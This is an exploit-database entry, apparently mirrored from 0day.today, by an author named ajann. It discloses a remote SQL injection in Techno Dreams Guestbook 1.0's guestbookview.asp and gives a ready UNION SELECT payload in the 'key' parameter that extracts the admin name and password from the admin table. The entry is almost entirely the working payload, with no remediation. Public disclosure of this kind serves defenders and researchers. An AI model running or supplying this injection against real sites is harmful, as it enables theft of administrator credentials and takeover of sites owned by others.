id: 1090
date: 10/30/2006
title: Techno Dreams Guestbook 1.0 (key) Remote SQL Injection Vulnerability
author: ajann
cves: 

====================================================================
Techno Dreams Guestbook 1.0 (key) Remote SQL Injection Vulnerability
====================================================================



*******************************************************************************
# Title  :  Techno Dreams Guestbook v1.0 (guestbookview.asp) Remote SQL Injection Vulnerability
# Author :   ajann

*******************************************************************************

###http://[target]/[path]/guestbookview.asp?key=[  SQL ]

Example:

//guestbookview.asp?key=7782%20union%20select%200,0,adminname,password,0,0,0%20from%20admin


"""""""""""""""""""""
# ajann,Turkey
# ...

# Im not Hacker!


#  0day.today [2023-03-26]  #